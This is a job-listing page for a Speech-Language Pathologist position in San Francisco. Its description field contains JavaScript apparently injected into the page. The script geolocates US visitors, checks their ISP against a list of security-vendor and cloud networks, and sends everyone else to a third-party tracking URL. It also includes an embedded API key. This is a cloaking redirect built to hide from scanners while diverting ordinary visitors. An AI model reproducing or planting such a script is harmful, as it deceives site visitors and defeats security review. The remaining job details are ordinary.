Speech Language Pathologist 130k

San Francisco, CA
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/693c0573bb3b2807/106418af506b57c8c1c1fdcb6d945fd139d098e963b2643d884a372b6ac8635a/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

This full-time, contract Speech-Language Pathologist role offers a salary of $130,000 annually with comprehensive benefits including 401(k), health, dental, vision, life insurance, paid time off, and professional development support.


Primary responsibilities include conducting evaluations in Speech, Language, Hearing, and Communication, analyzing data, and collaborating with school personnel and families. The role involves diagnosing and assessing students using appropriate tests, developing and implementing IEPs, and providing direct speech therapy services tailored to diverse student needs. The SLP will participate in identification, screening, and report preparation, facilitate student placement, and support inclusive practices aligned with research-based methods. Additionally, the position requires attendance at meetings such as IEPs and 504 plans, ensuring compliance with professional and legal standards, and maintaining student safety and progress.


Qualifications include a Master’s degree, an active SLP license, and preferred experience of at least one year. The work setting is in person, emphasizing collaboration, diversity, and professional ethics.